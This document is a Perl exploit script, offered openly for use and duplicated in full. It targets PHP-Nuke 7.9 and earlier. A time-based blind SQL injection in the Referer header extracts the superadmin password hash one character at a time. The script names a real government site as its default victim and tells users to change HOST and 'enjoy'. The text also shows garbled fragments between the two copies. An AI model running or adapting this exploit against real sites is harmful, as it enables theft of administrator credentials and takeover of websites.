POSTNUKE <=7.9 0day
#!/usr/bin/perl
#0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)
#root_unix www.unixcrew.org
#Chiudere tutti i programmi che possono occupare banda
#kill all the programs that can slow down the connection
#!/usr/bin/perl
#0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)
#root_unix www.unixcrew.org
#Chiudere tutti i programmi che possono occupare banda
#kill all the programs that can slow down the connection
#Modificare la variabile HOST e divertitevi
#modify the variable HOST and enjoy
use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;
my $host = "http://www.softwarelivre.gov.br";
my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(GET => $host);
my $referer;
my $inizio;
my $risposta;
my $fine;
my $tempodefault;
my $tempo;
my $i;
my $j;
my $hash;
my @array;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$referer="http://www.hackingz0ne.altervista.org";
$tempodefault=richiesta($referer);
$hash="";
#QUERY RISULTANTE
#INSERT INTO nuke_referer VALUES (NULL, 'http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,1,1))=102),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*')
for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)
{
$referer="http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*";
$tempo=richiesta($referer);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$tempo=richiesta($referer);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$hash .=chr($array[$j]);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
$j=200;
}
}
}
if($i==1)
{
if($hash eq "")
{
$i=200;
print "Attacco Fallito Sito Fixato\n";
}
}
}
print "Attacco Terminato\n\n";
system("pause");
sub richiesta{
$referer=$_[0];
$metodo->referrer($referer);
$inizio=Time::HiRes::time();
$risposta=$useragent->request($metodo);
$risposta->is_success or die "$host : ",$risposta->message,"\n";
$fine=Time::HiRes::time();
$tempo=$fine-$inizio;
return $tempo
}
sub aggiorna{
system("cls");
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
print "Exploit Php-Nuke <=7.9 By Rossi46GO maybe other version (Ex. 8.0) Thx KingOfSka\n";
print "Visit www.Hackingz0ne.altervista.org\n\n";
print "Sito Vittima : " . $_[0] . "\n";
print "Tempo Default : " . $_[1] . " secondi\n";
print "Bruteforcing Hash : " . chr($array[$_[2]]) . "\n";
print "Bruteforcing n carattere Hash : " . $_[5] . "\n";
print "Tempo sql : " . $_[4] . " secondi\n";
print "Hash : " . $_[3] . "\n";
}=7.9>=7.9>
#!/usr/bin/perl
#0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)
#root_unix www.unixcrew.org
#Chiudere tutti i programmi che possono occupare banda
#kill all the programs that can slow down the connection
#!/usr/bin/perl
#0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)
#root_unix www.unixcrew.org
#Chiudere tutti i programmi che possono occupare banda
#kill all the programs that can slow down the connection
#Modificare la variabile HOST e divertitevi
#modify the variable HOST and enjoy
use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;
my $host = "http://www.softwarelivre.gov.br";
my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(GET => $host);
my $referer;
my $inizio;
my $risposta;
my $fine;
my $tempodefault;
my $tempo;
my $i;
my $j;
my $hash;
my @array;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$referer="http://www.hackingz0ne.altervista.org";
$tempodefault=richiesta($referer);
$hash="";
#QUERY RISULTANTE
#INSERT INTO nuke_referer VALUES (NULL, 'http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,1,1))=102),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*')
for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)
{
$referer="http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*";
$tempo=richiesta($referer);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$tempo=richiesta($referer);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$hash .=chr($array[$j]);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
$j=200;
}
}
}
if($i==1)
{
if($hash eq "")
{
$i=200;
print "Attacco Fallito Sito Fixato\n";
}
}
}
print "Attacco Terminato\n\n";
system("pause");
sub richiesta{
$referer=$_[0];
$metodo->referrer($referer);
$inizio=Time::HiRes::time();
$risposta=$useragent->request($metodo);
$risposta->is_success or die "$host : ",$risposta->message,"\n";
$fine=Time::HiRes::time();
$tempo=$fine-$inizio;
return $tempo
}
sub aggiorna{
system("cls");
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
print "Exploit Php-Nuke <=7.9 By Rossi46GO maybe other version (Ex. 8.0) Thx KingOfSka\n";
print "Visit www.Hackingz0ne.altervista.org\n\n";
print "Sito Vittima : " . $_[0] . "\n";
print "Tempo Default : " . $_[1] . " secondi\n";
print "Bruteforcing Hash : " . chr($array[$_[2]]) . "\n";
print "Bruteforcing n carattere Hash : " . $_[5] . "\n";
print "Tempo sql : " . $_[4] . " secondi\n";
print "Hash : " . $_[3] . "\n";
}